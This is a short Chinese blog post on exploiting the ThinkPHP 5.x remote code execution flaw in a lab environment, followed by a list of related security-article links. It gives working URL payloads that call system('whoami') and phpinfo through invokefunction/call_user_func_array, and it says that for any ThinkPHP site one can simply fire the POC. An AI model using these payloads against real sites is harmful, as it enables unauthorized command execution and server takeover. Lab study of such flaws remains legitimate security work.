常见框架漏洞(Thinkphp)

Thinkphp5x远程命令执行及getshell

开启环境,访问靶场


可以用工具进行检测是否存在漏洞

存在漏洞可以直接用工具get shell

也可以手工操作

远程代码执行whoami
POC:
? s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1]

\]=whoami ![](https://i-blog.csdnimg.cn/direct/3f9cea23ca9c4ceda547abd9ef7acffd.png) ?s=/Index/\\think\\app/invokefunction\&function=call_user_func_array\&vars\[0\]=phpinfo\&vars\[ 1\]\[\]=-1 Thinkphp被曝很多漏洞,截至目前位置3x -- 6x的各个版本都被爆有大量漏洞,遇到TP的 站,直接打poc就可以了

相关推荐
不灭锦鲤13 分钟前
网络安全学习第16集(cdn知识点)
学习·安全
上海云盾第一敬业销售4 小时前
为什么网站需要高防IP?高防IP的优势是什么?
网络·tcp/ip·安全
叙后尘4 小时前
2025年湖北中级注册安全工程师报考那些事
安全
前与端5 小时前
前端XSS常见特征与防范措施
安全
拉法豆粉6 小时前
渗透测试与漏洞扫描有什么区别?
网络·安全·web安全
介一安全7 小时前
网络端口号全景解析:从基础服务到特殊应用的完整指南
服务器·网络·web安全·安全性测试·端口
曹莓可爱多7 小时前
常见CMS
网络·安全·web安全
段嘉许OvO7 小时前
常⻅CMS漏洞
安全
重装小兔19c2577 小时前
vulhub-Thales靶机练习
安全
厦门辰迈智慧科技有限公司8 小时前
山洪灾害监测预警系统主要涵盖
物联网·安全·自动化·监测